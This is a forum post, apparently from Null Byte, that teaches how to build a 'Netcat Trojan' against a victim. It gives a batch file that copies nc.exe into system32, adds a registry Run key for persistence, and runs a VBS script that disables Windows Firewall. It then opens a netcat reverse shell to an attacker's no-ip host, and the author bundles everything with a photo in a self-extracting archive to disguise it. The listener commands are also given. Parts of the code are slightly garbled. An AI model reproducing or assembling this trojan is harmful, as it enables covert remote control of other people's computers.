Forum Thread: Netcat Trojan [My Method by Mohamed Ahmed]

I'll explain a little:

Reverse shell

It is when the victim connects to you and gives you a shell. The non-ip what does redirect your dynamic ip to a dns address (I have it every 3 seconds) this makes that for more that your ip changes, it will always associate with your dns (ej loquesea.no-ip.org) already explained this we do with netcat we make a bat with the name vamos.bat

And we put these commands:
Code

  • nc.exe

you have to copy it to the victim in:

  • copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exe

in addition to this bat put it in the registry run, for what?

-so that every time the machine is run I run it
Code:

  • start C:\Extracted\data.exe

I Also Did a Vbs to Disable the Windows Friweall, Which Is the Following Code:

Set objFirewall = CreateObject ("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile

objPolicy.FirewallEnabled = false

  • We keep this as desa.vbs also in the bat we do execute

Code

  • start C:\Extracted\desa.vbs

the only thing missing is to put the command to connect
Code
nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443

well the bat would look like this:
code

@echo off
start C: \ Extracted \ desa.vbs
copy C: \ Extracted \ nc.exe C: \ WINDOWS \ system32 \ nc.exe

reg add hklm \ software \ microsoft \ windows \ currentversion \ run / v wind / t reg_sz / d C: \ Extracted \ vamos.exe / f

nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443

  • and the desa.vbs would look like this:

Code
Set objFirewall = CreateObject ("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile

objPolicy.FirewallEnabled = false

Now after you have that, to bat we went to exe with Bat To Exe Converter.exe then we put everything together (nc.exe, desa.vbs, vamos.exe) when we put it all together we put the photo, the Vamos.exe and then the rest (you have to respect the order) I use the program SFX COMPILER

ending, in your machine you put in a bat:

Code
nc -vv -l -p 80

in another bat

Code
nc -vv -l -p 443

execute the two and wait for the connection before disable your firewall.

If you want to test before, in a local network or virtual machine (virtual box) is as follows:

on the victim computer copy nc.exe in sytem32, then make a bat with the following code:

Code
nc ip of your local machine 80 | cmd.exe | nc ip of your local machine 443

to put "|" precional alt + ctrl + 1

Now on our machine disconnect the windows firewall then perform 2 bat and the same place a command:

this is 1

Code
nc -vv -l -p 80

this is 2

Code
nc -vv -l -p 443

EYE: FIRST RUN THESE 2 BAT SO THAT THEY ARE LISTENING, AND THEN THE COMMAND IN THE VICTIM.

greetings..

Get The Weekly Null Byte Newsletter

Never miss a Null Byte guide.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active